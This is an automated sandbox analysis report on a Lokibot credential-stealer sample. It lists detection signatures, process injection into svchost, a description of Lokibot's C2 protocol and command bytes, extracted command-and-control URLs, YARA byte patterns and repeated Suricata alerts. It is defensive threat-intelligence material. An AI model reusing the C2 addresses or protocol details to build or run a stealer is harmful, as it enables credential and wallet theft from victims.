Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vsf098633534.exe

Overview

General Information

Sample name:vsf098633534.exe
Analysis ID:1619628
MD5:cb68430ac5f87fddaf2af8477b82308c
SHA1:4b86f7f627f7bb989fc02e76dfe687c7d0d5ca91
SHA256:5eb39af58bc99962a6439d873bda78086903301b0476ef79daf3802220fdf382
Tags:exeLokiuser-threatcat_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • vsf098633534.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\vsf098633534.exe" MD5: CB68430AC5F87FDDAF2AF8477B82308C)
    • svchost.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\vsf098633534.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2918405365.0000000003212000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 24 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ParentImage: C:\Users\user\Desktop\vsf098633534.exe, ParentProcessId: 7020, ParentProcessName: vsf098633534.exe, ProcessCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ProcessId: 7080, ProcessName: svchost.exe
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ParentImage: C:\Users\user\Desktop\vsf098633534.exe, ParentProcessId: 7020, ParentProcessName: vsf098633534.exe, ProcessCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ProcessId: 7080, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-20T03:43:15.323418+010020243121A Network Trojan was detected192.168.2.449731104.21.64.180TCP
                  2025-02-20T03:43:17.388825+010020243121A Network Trojan was detected192.168.2.449732104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-20T03:43:14.532930+010020253811Malware Command and Control Activity Detected192.168.2.449731104.21.64.180TCP
                  2025-02-20T03:43:16.479030+010020253811Malware Command and Control Activity Detected192.168.2.449732104.21.64.180TCP
                  2025-02-20T03:43:17.451575+010020253811Malware Command and Control Activity Detected192.168.2.449733104.21.64.180TCP
                  2025-02-20T03:43:19.442017+010020253811Malware Command and Control Activity Detected192.168.2.449734104.21.64.180TCP
                  2025-02-20T03:43:21.771429+010020253811Malware Command and Control Activity Detected192.168.2.449735104.21.64.180TCP
                  2025-02-20T03:43:23.729997+010020253811Malware Command and Control Activity Detected192.168.2.449736104.21.64.180TCP
                  2025-02-20T03:43:25.651126+010020253811Malware Command and Control Activity Detected192.168.2.449737104.21.64.180TCP
                  2025-02-20T03:43:27.752713+010020253811Malware Command and Control Activity Detected192.168.2.449738104.21.64.180TCP
                  2025-02-20T03:43:29.660543+010020253811Malware Command and Control Activity Detected192.168.2.449741104.21.64.180TCP
                  2025-02-20T03:43:31.521910+010020253811Malware Command and Control Activity Detected192.168.2.449745104.21.64.180TCP
                  2025-02-20T03:43:33.456489+010020253811Malware Command and Control Activity Detected192.168.2.449747104.21.64.180TCP
                  2025-02-20T03:43:35.363345+010020253811Malware Command and Control Activity Detected192.168.2.449748104.21.64.180TCP
                  2025-02-20T03:43:37.303125+010020253811Malware Command and Control Activity Detected192.168.2.449749104.21.64.180TCP
                  2025-02-20T03:43:39.205648+010020253811Malware Command and Control Activity Detected192.168.2.449750104.21.64.180TCP
                  2025-02-20T03:43:41.134380+010020253811Malware Command and Control Activity Detected192.168.2.449751104.21.64.180TCP
                  2025-02-20T03:43:43.094784+010020253811Malware Command and Control Activity Detected192.168.2.449752104.21.64.180TCP
                  2025-02-20T03:43:45.102723+010020253811Malware Command and Control Activity Detected192.168.2.449753104.21.64.180TCP
                  2025-02-20T03:43:46.997245+010020253811Malware Command and Control Activity Detected192.168.2.449754104.21.64.180TCP
                  2025-02-20T03:43:48.866259+010020253811Malware Command and Control Activity Detected192.168.2.449755104.21.64.180TCP
                  2025-02-20T03:43:50.820013+010020253811Malware Command and Control Activity Detected192.168.2.449756104.21.64.180TCP
                  2025-02-20T03:43:52.721741+010020253811Malware Command and Control Activity Detected192.168.2.449757104.21.64.180TCP
                  2025-02-20T03:43:54.693351+010020253811Malware Command and Control Activity Detected192.168.2.449758104.21.64.180TCP
                  2025-02-20T03:43:56.661305+010020253811Malware Command and Control Activity Detected192.168.2.449759104.21.64.180TCP
                  2025-02-20T03:43:58.705695+010020253811Malware Command and Control Activity Detected192.168.2.449760104.21.64.180TCP
                  2025-02-20T03:44:00.632178+010020253811Malware Command and Control Activity Detected192.168.2.449761104.21.64.180TCP
                  2025-02-20T03:44:02.549016+010020253811Malware Command and Control Activity Detected192.168.2.449762104.21.64.180TCP
                  2025-02-20T03:44:04.348269+010020253811Malware Command and Control Activity Detected192.168.2.449763104.21.64.180TCP
                  2025-02-20T03:44:06.337593+010020253811Malware Command and Control Activity Detected192.168.2.449764104.21.64.180TCP
                  2025-02-20T03:44:08.290722+010020253811Malware Command and Control Activity Detected192.168.2.449766104.21.64.180TCP
                  2025-02-20T03:44:10.316672+010020253811Malware Command and Control Activity Detected192.168.2.449768104.21.64.180TCP
                  2025-02-20T03:44:12.216353+010020253811Malware Command and Control Activity Detected192.168.2.449779104.21.64.180TCP
                  2025-02-20T03:44:14.257584+010020253811Malware Command and Control Activity Detected192.168.2.449793104.21.64.180TCP
                  2025-02-20T03:44:16.237190+010020253811Malware Command and Control Activity Detected192.168.2.449806104.21.64.180TCP
                  2025-02-20T03:44:18.180783+010020253811Malware Command and Control Activity Detected192.168.2.449819104.21.64.180TCP
                  2025-02-20T03:44:20.117514+010020253811Malware Command and Control Activity Detected192.168.2.449829104.21.64.180TCP
                  2025-02-20T03:44:22.080002+010020253811Malware Command and Control Activity Detected192.168.2.449840104.21.64.180TCP
                  2025-02-20T03:44:24.005441+010020253811Malware Command and Control Activity Detected192.168.2.449854104.21.64.180TCP
                  2025-02-20T03:44:25.986832+010020253811Malware Command and Control Activity Detected192.168.2.449868104.21.64.180TCP
                  2025-02-20T03:44:27.785264+010020253811Malware Command and Control Activity Detected192.168.2.449881104.21.64.180TCP
                  2025-02-20T03:44:29.675258+010020253811Malware Command and Control Activity Detected192.168.2.449892104.21.64.180TCP
                  2025-02-20T03:44:31.765736+010020253811Malware Command and Control Activity Detected192.168.2.449908104.21.64.180TCP
                  2025-02-20T03:44:33.834170+010020253811Malware Command and Control Activity Detected192.168.2.449922104.21.64.180TCP
                  2025-02-20T03:44:35.821785+010020253811Malware Command and Control Activity Detected192.168.2.449934104.21.64.180TCP
                  2025-02-20T03:44:37.738492+010020253811Malware Command and Control Activity Detected192.168.2.449946104.21.64.180TCP
                  2025-02-20T03:44:39.722812+010020253811Malware Command and Control Activity Detected192.168.2.449958104.21.64.180TCP
                  2025-02-20T03:44:41.717939+010020253811Malware Command and Control Activity Detected192.168.2.449973104.21.64.180TCP
                  2025-02-20T03:44:43.553868+010020253811Malware Command and Control Activity Detected192.168.2.449986104.21.64.180TCP
                  2025-02-20T03:44:45.418212+010020253811Malware Command and Control Activity Detected192.168.2.449999104.21.64.180TCP
                  2025-02-20T03:44:47.367804+010020253811Malware Command and Control Activity Detected192.168.2.450013104.21.64.180TCP
                  2025-02-20T03:44:49.319994+010020253811Malware Command and Control Activity Detected192.168.2.450027104.21.64.180TCP
                  2025-02-20T03:44:51.269807+010020253811Malware Command and Control Activity Detected192.168.2.450041104.21.64.180TCP
                  2025-02-20T03:44:53.251485+010020253811Malware Command and Control Activity Detected192.168.2.450053104.21.64.180TCP
                  2025-02-20T03:44:55.447771+010020253811Malware Command and Control Activity Detected192.168.2.450056104.21.64.180TCP
                  2025-02-20T03:44:57.397582+010020253811Malware Command and Control Activity Detected192.168.2.450057104.21.64.180TCP
                  2025-02-20T03:44:59.369050+010020253811Malware Command and Control Activity Detected192.168.2.450058104.21.64.180TCP
                  2025-02-20T03:45:01.395935+010020253811Malware Command and Control Activity Detected192.168.2.450059104.21.64.180TCP
                  2025-02-20T03:45:03.336005+010020253811Malware Command and Control Activity Detected192.168.2.450060104.21.64.180TCP
                  2025-02-20T03:45:05.459884+010020253811Malware Command and Control Activity Detected192.168.2.450061104.21.64.180TCP
                  2025-02-20T03:45:07.274491+010020253811Malware Command and Control Activity Detected192.168.2.450062104.21.64.180TCP
                  2025-02-20T03:45:09.425072+010020253811Malware Command and Control Activity Detected192.168.2.450063104.21.64.180TCP
                  2025-02-20T03:45:11.338444+010020253811Malware Command and Control Activity Detected192.168.2.450064104.21.64.180TCP
                  2025-02-20T03:45:13.295502+010020253811Malware Command and Control Activity Detected192.168.2.450065104.21.64.180TCP
                  2025-02-20T03:45:15.286586+010020253811Malware Command and Control Activity Detected192.168.2.450066104.21.64.180TCP
                  2025-02-20T03:45:17.298173+010020253811Malware Command and Control Activity Detected192.168.2.450067104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-20T03:43:14.427531+010020254831A Network Trojan was detected104.21.64.180192.168.2.450067TCP
                  2025-02-20T03:43:18.285091+010020254831A Network Trojan was detected104.21.64.180192.168.2.449733TCP
                  2025-02-20T03:43:20.272240+010020254831A Network Trojan was detected104.21.64.180192.168.2.449734TCP
                  2025-02-20T03:43:22.580509+010020254831A Network Trojan was detected104.21.64.180192.168.2.449735TCP
                  2025-02-20T03:43:26.470269+010020254831A Network Trojan was detected104.21.64.180192.168.2.449737TCP
                  2025-02-20T03:43:32.309783+010020254831A Network Trojan was detected104.21.64.180192.168.2.449745TCP
                  2025-02-20T03:43:38.075914+010020254831A Network Trojan was detected104.21.64.180192.168.2.449749TCP
                  2025-02-20T03:43:41.920221+010020254831A Network Trojan was detected104.21.64.180192.168.2.449751TCP
                  2025-02-20T03:43:43.912590+010020254831A Network Trojan was detected104.21.64.180192.168.2.449752TCP
                  2025-02-20T03:43:47.717726+010020254831A Network Trojan was detected104.21.64.180192.168.2.449754TCP
                  2025-02-20T03:43:49.667999+010020254831A Network Trojan was detected104.21.64.180192.168.2.449755TCP
                  2025-02-20T03:43:53.550248+010020254831A Network Trojan was detected104.21.64.180192.168.2.449757TCP
                  2025-02-20T03:43:55.488427+010020254831A Network Trojan was detected104.21.64.180192.168.2.449758TCP
                  2025-02-20T03:43:59.472981+010020254831A Network Trojan was detected104.21.64.180192.168.2.449760TCP
                  2025-02-20T03:44:01.399671+010020254831A Network Trojan was detected104.21.64.180192.168.2.449761TCP
                  2025-02-20T03:44:03.208740+010020254831A Network Trojan was detected104.21.64.180192.168.2.449762TCP
                  2025-02-20T03:44:05.175755+010020254831A Network Trojan was detected104.21.64.180192.168.2.449763TCP
                  2025-02-20T03:44:09.173953+010020254831A Network Trojan was detected104.21.64.180192.168.2.449766TCP
                  2025-02-20T03:44:13.099060+010020254831A Network Trojan was detected104.21.64.180192.168.2.449779TCP
                  2025-02-20T03:44:15.066841+010020254831A Network Trojan was detected104.21.64.180192.168.2.449793TCP
                  2025-02-20T03:44:17.022997+010020254831A Network Trojan was detected104.21.64.180192.168.2.449806TCP
                  2025-02-20T03:44:20.915778+010020254831A Network Trojan was detected104.21.64.180192.168.2.449829TCP
                  2025-02-20T03:44:24.824962+010020254831A Network Trojan was detected104.21.64.180192.168.2.449854TCP
                  2025-02-20T03:44:26.639425+010020254831A Network Trojan was detected104.21.64.180192.168.2.449868TCP
                  2025-02-20T03:44:32.668381+010020254831A Network Trojan was detected104.21.64.180192.168.2.449908TCP
                  2025-02-20T03:44:34.666252+010020254831A Network Trojan was detected104.21.64.180192.168.2.449922TCP
                  2025-02-20T03:44:38.565398+010020254831A Network Trojan was detected104.21.64.180192.168.2.449946TCP
                  2025-02-20T03:44:40.533589+010020254831A Network Trojan was detected104.21.64.180192.168.2.449958TCP
                  2025-02-20T03:44:42.380787+010020254831A Network Trojan was detected104.21.64.180192.168.2.449973TCP
                  2025-02-20T03:44:44.276001+010020254831A Network Trojan was detected104.21.64.180192.168.2.449986TCP
                  2025-02-20T03:44:46.217280+010020254831A Network Trojan was detected104.21.64.180192.168.2.449999TCP
                  2025-02-20T03:44:50.023196+010020254831A Network Trojan was detected104.21.64.180192.168.2.450027TCP
                  2025-02-20T03:44:52.091745+010020254831A Network Trojan was detected104.21.64.180192.168.2.450041TCP
                  2025-02-20T03:44:54.035383+010020254831A Network Trojan was detected104.21.64.180192.168.2.450053TCP
                  2025-02-20T03:44:56.242976+010020254831A Network Trojan was detected104.21.64.180192.168.2.450056TCP
                  2025-02-20T03:44:58.222823+010020254831A Network Trojan was detected104.21.64.180192.168.2.450057TCP
                  2025-02-20T03:45:00.186635+010020254831A Network Trojan was detected104.21.64.180192.168.2.450058TCP
                  2025-02-20T03:45:02.160343+010020254831A Network Trojan was detected104.21.64.180192.168.2.450059TCP
                  2025-02-20T03:45:04.188919+010020254831A Network Trojan was detected104.21.64.180192.168.2.450060TCP
                  2025-02-20T03:45:06.111884+010020254831A Network Trojan was detected104.21.64.180192.168.2.450061TCP
                  2025-02-20T03:45:12.136494+010020254831A Network Trojan was detected104.21.64.180192.168.2.450064TCP
                  2025-02-20T03:45:14.088586+010020254831A Network Trojan was detected104.21.64.180192.168.2.450065TCP
                  2025-02-20T03:45:16.105934+010020254831A Network Trojan was detected104.21.64.180192.168.2.450066TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-20T03:43:18.278303+010020243131Malware Command and Control Activity Detected192.168.2.449733104.21.64.180TCP
                  2025-02-20T03:43:20.267191+010020243131Malware Command and Control Activity Detected192.168.2.449734104.21.64.180TCP
                  2025-02-20T03:43:22.574776+010020243131Malware Command and Control Activity Detected192.168.2.449735104.21.64.180TCP
                  2025-02-20T03:43:24.489416+010020243131Malware Command and Control Activity Detected192.168.2.449736104.21.64.180TCP
                  2025-02-20T03:43:26.463190+010020243131Malware Command and Control Activity Detected192.168.2.449737104.21.64.180TCP
                  2025-02-20T03:43:28.504763+010020243131Malware Command and Control Activity Detected192.168.2.449738104.21.64.180TCP
                  2025-02-20T03:43:30.375616+010020243131Malware Command and Control Activity Detected192.168.2.449741104.21.64.180TCP
                  2025-02-20T03:43:32.302084+010020243131Malware Command and Control Activity Detected192.168.2.449745104.21.64.180TCP
                  2025-02-20T03:43:34.207473+010020243131Malware Command and Control Activity Detected192.168.2.449747104.21.64.180TCP
                  2025-02-20T03:43:36.139359+010020243131Malware Command and Control Activity Detected192.168.2.449748104.21.64.180TCP
                  2025-02-20T03:43:38.070830+010020243131Malware Command and Control Activity Detected192.168.2.449749104.21.64.180TCP
                  2025-02-20T03:43:39.936584+010020243131Malware Command and Control Activity Detected192.168.2.449750104.21.64.180TCP
                  2025-02-20T03:43:41.914924+010020243131Malware Command and Control Activity Detected192.168.2.449751104.21.64.180TCP
                  2025-02-20T03:43:43.907574+010020243131Malware Command and Control Activity Detected192.168.2.449752104.21.64.180TCP
                  2025-02-20T03:43:45.839243+010020243131Malware Command and Control Activity Detected192.168.2.449753104.21.64.180TCP
                  2025-02-20T03:43:47.712754+010020243131Malware Command and Control Activity Detected192.168.2.449754104.21.64.180TCP
                  2025-02-20T03:43:49.660952+010020243131Malware Command and Control Activity Detected192.168.2.449755104.21.64.180TCP
                  2025-02-20T03:43:51.567802+010020243131Malware Command and Control Activity Detected192.168.2.449756104.21.64.180TCP
                  2025-02-20T03:43:53.545131+010020243131Malware Command and Control Activity Detected192.168.2.449757104.21.64.180TCP
                  2025-02-20T03:43:55.482262+010020243131Malware Command and Control Activity Detected192.168.2.449758104.21.64.180TCP
                  2025-02-20T03:43:57.403205+010020243131Malware Command and Control Activity Detected192.168.2.449759104.21.64.180TCP
                  2025-02-20T03:43:59.467933+010020243131Malware Command and Control Activity Detected192.168.2.449760104.21.64.180TCP
                  2025-02-20T03:44:01.394606+010020243131Malware Command and Control Activity Detected192.168.2.449761104.21.64.180TCP
                  2025-02-20T03:44:03.203757+010020243131Malware Command and Control Activity Detected192.168.2.449762104.21.64.180TCP
                  2025-02-20T03:44:05.170718+010020243131Malware Command and Control Activity Detected192.168.2.449763104.21.64.180TCP
                  2025-02-20T03:44:07.123723+010020243131Malware Command and Control Activity Detected192.168.2.449764104.21.64.180TCP
                  2025-02-20T03:44:09.168850+010020243131Malware Command and Control Activity Detected192.168.2.449766104.21.64.180TCP
                  2025-02-20T03:44:11.054295+010020243131Malware Command and Control Activity Detected192.168.2.449768104.21.64.180TCP
                  2025-02-20T03:44:13.092683+010020243131Malware Command and Control Activity Detected192.168.2.449779104.21.64.180TCP
                  2025-02-20T03:44:15.060888+010020243131Malware Command and Control Activity Detected192.168.2.449793104.21.64.180TCP
                  2025-02-20T03:44:17.017876+010020243131Malware Command and Control Activity Detected192.168.2.449806104.21.64.180TCP
                  2025-02-20T03:44:18.948386+010020243131Malware Command and Control Activity Detected192.168.2.449819104.21.64.180TCP
                  2025-02-20T03:44:20.910590+010020243131Malware Command and Control Activity Detected192.168.2.449829104.21.64.180TCP
                  2025-02-20T03:44:22.852440+010020243131Malware Command and Control Activity Detected192.168.2.449840104.21.64.180TCP
                  2025-02-20T03:44:24.819834+010020243131Malware Command and Control Activity Detected192.168.2.449854104.21.64.180TCP
                  2025-02-20T03:44:26.634314+010020243131Malware Command and Control Activity Detected192.168.2.449868104.21.64.180TCP
                  2025-02-20T03:44:28.529010+010020243131Malware Command and Control Activity Detected192.168.2.449881104.21.64.180TCP
                  2025-02-20T03:44:30.432256+010020243131Malware Command and Control Activity Detected192.168.2.449892104.21.64.180TCP
                  2025-02-20T03:44:32.663291+010020243131Malware Command and Control Activity Detected192.168.2.449908104.21.64.180TCP
                  2025-02-20T03:44:34.661211+010020243131Malware Command and Control Activity Detected192.168.2.449922104.21.64.180TCP
                  2025-02-20T03:44:36.566884+010020243131Malware Command and Control Activity Detected192.168.2.449934104.21.64.180TCP
                  2025-02-20T03:44:38.560384+010020243131Malware Command and Control Activity Detected192.168.2.449946104.21.64.180TCP
                  2025-02-20T03:44:40.528513+010020243131Malware Command and Control Activity Detected192.168.2.449958104.21.64.180TCP
                  2025-02-20T03:44:42.375594+010020243131Malware Command and Control Activity Detected192.168.2.449973104.21.64.180TCP
                  2025-02-20T03:44:44.228854+010020243131Malware Command and Control Activity Detected192.168.2.449986104.21.64.180TCP
                  2025-02-20T03:44:46.211968+010020243131Malware Command and Control Activity Detected192.168.2.449999104.21.64.180TCP
                  2025-02-20T03:44:48.129551+010020243131Malware Command and Control Activity Detected192.168.2.450013104.21.64.180TCP
                  2025-02-20T03:44:50.017620+010020243131Malware Command and Control Activity Detected192.168.2.450027104.21.64.180TCP
                  2025-02-20T03:44:52.086657+010020243131Malware Command and Control Activity Detected192.168.2.450041104.21.64.180TCP
                  2025-02-20T03:44:54.030291+010020243131Malware Command and Control Activity Detected192.168.2.450053104.21.64.180TCP
                  2025-02-20T03:44:56.235776+010020243131Malware Command and Control Activity Detected192.168.2.450056104.21.64.180TCP
                  2025-02-20T03:44:58.216631+010020243131Malware Command and Control Activity Detected192.168.2.450057104.21.64.180TCP
                  2025-02-20T03:45:00.181510+010020243131Malware Command and Control Activity Detected192.168.2.450058104.21.64.180TCP
                  2025-02-20T03:45:02.154762+010020243131Malware Command and Control Activity Detected192.168.2.450059104.21.64.180TCP
                  2025-02-20T03:45:04.177292+010020243131Malware Command and Control Activity Detected192.168.2.450060104.21.64.180TCP
                  2025-02-20T03:45:06.106556+010020243131Malware Command and Control Activity Detected192.168.2.450061104.21.64.180TCP
                  2025-02-20T03:45:08.243365+010020243131Malware Command and Control Activity Detected192.168.2.450062104.21.64.180TCP
                  2025-02-20T03:45:10.160329+010020243131Malware Command and Control Activity Detected192.168.2.450063104.21.64.180TCP
                  2025-02-20T03:45:12.131378+010020243131Malware Command and Control Activity Detected192.168.2.450064104.21.64.180TCP
                  2025-02-20T03:45:14.083485+010020243131Malware Command and Control Activity Detected192.168.2.450065104.21.64.180TCP
                  2025-02-20T03:45:16.100549+010020243131Malware Command and Control Activity Detected192.168.2.450066104.21.64.180TCP
                  2025-02-20T03:45:18.101250+010020243131Malware Command and Control Activity Detected192.168.2.450067104.21.64.180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-20T03:43:14.532930+010020216411A Network Trojan was detected192.168.2.449731104.21.64.180TCP
                  2025-02-20T03:43:16.479030+010020216411A Network Trojan was detected192.168.2.449732104.21.64.180TCP
                  2025-02-20T03:43:17.451575+010020216411A Network Trojan was detected192.168.2.449733104.21.64.180TCP
                  2025-02-20T03:43:19.442017+010020216411A Network Trojan was detected192.168.2.449734104.21.64.180TCP
                  2025-02-20T03:43:21.771429+010020216411A Network Trojan was detected192.168.2.449735104.21.64.180TCP
                  2025-02-20T03:43:23.729997+010020216411A Network Trojan was detected192.168.2.449736104.21.64.180TCP
                  2025-02-20T03:43:25.651126+010020216411A Network Trojan was detected192.168.2.449737104.21.64.180TCP
                  2025-02-20T03:43:27.752713+010020216411A Network Trojan was detected192.168.2.449738104.21.64.180TCP
                  2025-02-20T03:43:29.660543+010020216411A Network Trojan was detected192.168.2.449741104.21.64.180TCP
                  2025-02-20T03:43:31.521910+010020216411A Network Trojan was detected192.168.2.449745104.21.64.180TCP
                  2025-02-20T03:43:33.456489+010020216411A Network Trojan was detected192.168.2.449747104.21.64.180TCP
                  2025-02-20T03:43:35.363345+010020216411A Network Trojan was detected192.168.2.449748104.21.64.180TCP
                  2025-02-20T03:43:37.303125+010020216411A Network Trojan was detected192.168.2.449749104.21.64.180TCP
                  2025-02-20T03:43:39.205648+010020216411A Network Trojan was detected192.168.2.449750104.21.64.180TCP
